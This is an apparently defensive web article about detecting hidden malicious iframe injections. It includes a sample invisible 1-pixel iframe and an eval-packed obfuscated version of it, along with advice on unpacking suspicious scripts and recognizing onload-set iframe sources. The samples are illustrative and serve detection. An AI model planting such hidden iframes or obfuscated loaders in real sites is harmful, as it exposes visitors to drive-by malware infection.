More information on hidden malicious iframe injections
Malicious iframes have a basic configuration as shown below:
[iframe src= url/ width=1 height=1 stye=visibility: hidden;][/iframe]
They have this setup so that hackers can hide these unwanted iframes by making them invisible. The iframe is created with a width and height of 1 pixel, visually it is just a point. They also specify a style that makes it invisible: hidden;’
These iframes are invisible to Internet users, but can be detected in the HTML code of your web page.
To hide iframes in the HTML, hackers use obfuscated scripts. Aside from obfuscated scripts, hackers now also use what are called bundled javascripts. Packaging javascripts is a good thing as it improves delivery and optimization. But, as always, these legitimate things can be misused to hide and embed malicious and unreadable iframes on your web page. When you check the HTML code of such web pages, you don’t see any iframe, just some JavaScript with unclear purpose, no URL and suspicious words inside. And since many modern web pages contain dozens of third-party scripts (eg ads, stats, widgets, etc.), these scripts are often overlooked by webmasters.
Let’s take the malicious iframe example above and package it. It would look like the following:
eval(function(p,a,c,k,e,r){e=String;if(!”.replace(/^/,String)){while(c–)r[c]=k[c]||c;k=[function(e){returnr[e]}];e=function(){return’\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return}(‘[02=’3://4/’5=’1’6=’1’7=’8:9;’][/0]’,10,10,’iframe||src|http|url|width|height|style|visibility|hidden’.split(‘|’),0,{}))
If you look at the code above, it’s hard to see if it’s malicious or not. You will notice some words that look suspicious, but may not be. Sometimes you may not see any suspicious text at all.
What you should do is unpack this compressed code when you are not sure if the scripts being loaded are malicious or not. A site you can visit to unpack these zip codes is: http://www.strictly-software.com/unpack-javascript.aspx
Simply copy the entire code, eval(function……..) and paste it into the box above. Click the “Unpack” button. The end result will show up in the second box and should be the actual code which should now be fully readable. Once the code is readable, you need to make sure it is malicious or not before removing it.
To hide malicious code, hackers sometimes encode their scripts multiple times, so even if you run such a script, you’ll just get another obfuscated or compressed script. The malicious script decodes itself and creates another encrypted script which in turn creates another hidden malicious iframe.
Further investigation into malicious iframes has shown that antivirus vendor Sophos warns that a new injection attack has infected thousands of websites with malicious iframes. To avoid detection, unauthorized IFrames obtain their src attribute (their URL) via a JavaScript “onload” event. Aside from heavy obfuscation, this attack uses a specific trick to bypass web scanners. More specifically, decoding the string will result in an IFrame that does not have a direct src value. It uses a javascript “Onload” function to generate it. The src usually points to a third party server that tries to infect visitors with malware. This often targets vulnerabilities in your software, so be sure to install critical patches for popular software like Adobe Reader, Flash Player, the Java Runtime Environment, Microsoft Office, or Windows itself. When you unzip the code, look for this.
